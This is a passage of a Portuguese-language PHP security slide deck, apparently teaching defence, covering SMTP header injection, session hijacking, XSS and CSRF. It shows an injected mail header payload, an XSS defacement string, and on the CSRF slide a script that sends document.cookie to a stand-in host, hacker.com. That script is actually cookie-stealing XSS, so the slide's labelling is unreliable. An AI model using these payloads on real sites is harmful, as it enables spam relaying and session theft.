  • 31. Injections - SMTP (4/4) From: site@site.com Subject: Ataque de spammers To: haxor@attack.com Subject:Mwahahaha Bcc:target@nothappy.com Content-Type:multipart/mixed; boundary=frog; 01: From: script@site.com --frog 02: Subject: Ataque de spammers Content-Type:text/html 03: To: destin@tario.com 04: <b>HTML Message.</b> 05: Atacaram nosso site! 06: --frog-- 07: . Content- Type:text/html;name=Security.html; Content-Transfer-Encoding:8bit Content-Disposition: attachment <u>HTML File</u> --frog-- Atacaram nosso site! .
  • 32. Session Hijacking Session fixation (bookmark) Sedejacking (sniffing) XSS e CSRF http://en.wikipedia.org/wiki/Session_hijacking
  • 33. XSS Cross Site Scripting Também referenciado como CSS $_POST[“msg'] = '<h4><font color=red>Este site foi hackeado!</font></h4>' http://en.wikipedia.org/wiki/Cross_site_scripting
  • 34. CSRF (ou XSRF) Cross Site Request Forgering <script> window.location= 'http://www.hacker.com?' + document.cookie </script> http://en.wikipedia.org/wiki/Cross-site_request_forgery
  • 35. *IMPORTANTE* $_GET $_POST $_COOKIES $_SERVER $_ENV $_FILES
  • 36. Segurança é um fator cultural, é um dever, é responsabilidade de todos!
  • 37. Fim! Agradecimentos Sites úteis www.php.net/security ProPHP www.php-security.org Tempo Real blog.php-security.org idéias.ual phpsec.org www.phpsecure.info programabrasil.blogspot.com